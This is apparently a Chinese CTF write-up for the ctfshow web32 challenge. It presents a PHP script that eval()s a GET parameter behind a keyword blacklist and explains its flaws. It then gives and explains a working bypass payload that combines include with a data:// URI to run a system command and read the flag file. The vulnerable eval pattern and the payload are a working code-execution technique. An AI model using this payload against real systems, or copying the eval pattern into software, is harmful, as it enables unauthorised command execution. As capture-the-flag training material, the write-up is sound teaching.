【CTFWP】ctfshow-web32

Long._.L2024-07-23 15:31

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

题目介绍:

php+HTML 复制代码 
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

题目分析:

这段代码是一个 PHP 脚本的一部分,是用于执行用户输入的代码片段。不过,它包含了一些安全漏洞,以下是对代码的分析和潜在问题:

  1. 错误报告关闭

    • error_reporting(0); 这一行关闭了错误报告,这会隐藏可能的错误信息,使得调试和发现问题变得更加困难。

  2. 用户输入处理

    • if(isset($_GET['c'])){ 检查是否接收到了 c 参数。
    • $c = $_GET['c']; 获取 c 参数的值。

  3. 正则表达式过滤

    • if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\|echo|;|(/i", $c)){` 使用正则表达式过滤一些关键词,防止执行一些危险的命令。然而,这个正则表达式并不完全有效,因为它没有考虑到一些其他的潜在危险字符或命令。

  4. 代码执行

    • eval($c); 执行传入的 PHP 代码。这是非常危险的,因为它可以执行任何 PHP 代码,包括恶意代码。

  5. 默认行为

    • else{ highlight_file(__FILE__); } 如果没有接收到 c 参数,脚本会显示当前文件的内容。

潜在问题:

  • 代码注入 :由于使用了 eval(),任何有效的 PHP 代码都可以被执行。这可能导致严重的安全问题,如远程代码执行。
  • 过滤不充分:正则表达式过滤可能不够全面,无法阻止所有恶意输入。
  • 错误隐藏:关闭错误报告可能会隐藏一些关键的错误信息,使得问题更难被发现和解决。

payload:

php 复制代码 
?c=include$_GET[1]?>&1=data://text/plain,<?php system("tac flag.php")?>

payload解释:

这段代码尝试通过 URL 参数传递恶意代码来绕过原始 PHP 脚本中的安全检查。让我们逐步分析:

  1. 参数传递

    • ?c=include$_GET[1]?>&1=data://text/plain,<?php system("tac flag.php")?>
    • 这里使用了 include 语句,尝试将 $_GET[1] 作为文件名来包含。

  2. 原始脚本的正则表达式过滤

    • 原始脚本中的正则表达式尝试过滤掉一些关键词,但存在漏洞。它没有过滤掉 include 这样的关键词。

  3. eval 执行

    • 如果正则表达式匹配失败(即没有匹配到禁止的关键词),则执行 eval($c)

分析:

  • 原始脚本的正则表达式过滤没有考虑到 include 语句的使用,这使得攻击者可以通过构造特定的参数来绕过过滤。
  • 通过构造 ?c=include$_GET[1]?>&1=data://text/plain,<?php system("tac flag.php")?>,攻击者尝试执行 include 语句,从而绕过 eval 函数的限制。

具体步骤:

  1. 参数解析

    • $_GET['c'] 被设置为 include$_GET[1]?>
    • $_GET[1] 被设置为 data://text/plain,<?php system("tac flag.php")?>

  2. 执行

    • 脚本首先尝试执行 eval($_GET['c']),但由于 include 语句不在正则表达式的过滤范围内,它将执行 include $_GET[1]

  3. 文件包含

    • include $_GET[1] 将包含 data://text/plain,<?php system("tac flag.php")?>,这实际上是一个数据 URI,包含 PHP 代码。

  4. 系统命令执行

    • 包含的代码执行 system("tac flag.php"),这将执行系统命令 tac flag.php,可能会泄露或修改文件内容。

flag

flag="ctfshow{eeeb78d3-831d-4a1b-bc6d-ff8d2d617768}"

相关推荐
AI服务老曹12 小时前
运用先进的智能算法和优化模型,进行科学合理调度的智慧园区开源了
运维·人工智能·安全·开源·音视频
网络安全King13 小时前
华为 网络安全 认证
安全·web安全
网络安全-老纪13 小时前
网络安全-js安全知识点与XSS常用payloads
javascript·安全·web安全
API_technology14 小时前
电商API安全防护:JWT令牌与XSS防御实战
前端·安全·xss
underatted14 小时前
2025tg最新免费社工库机器人
web安全·网络安全
Tipray200614 小时前
天 锐 蓝盾终端安全管理系统:办公U盘拷贝使用管控限制
安全
坚定信念,勇往无前18 小时前
Spring Boot 如何保证接口安全
spring boot·后端·安全
H轨迹H18 小时前
Vulnhun靶机-kioptix level 4-sql注入万能密码拿到权限ssh连接利用mysql-udf漏洞提权
网络安全·渗透测试·vulnhub·靶机·web漏洞·oscp
数造科技18 小时前
紧随“可信数据空间”政策风潮,数造科技正式加入开放数据空间联盟
大数据·人工智能·科技·安全·敏捷开发
winfredzhang19 小时前
Python实战:Excel中文转拼音工具开发教程
python·安全·excel·汉字·pinyin·缩写
热门推荐
01DeepSeek各版本说明与优缺点分析02如何在WPS和Word/Excel中直接使用DeepSeek功能03DeepSeek本地部署详细指南04太炸裂了!清华大学deepseek从入门到精通使用手册又出第三版了,《普通人如何抓住DeepSeek红利》(无套路,直接下载)05本地部署DeepSeek教程(Mac版本)06DeepSeek r1本地安装全指南07DeepSeek RAGFlow构建本地知识库系统08本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程09DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具10【docker】Windows10安装Docker Desktop - WSL update failed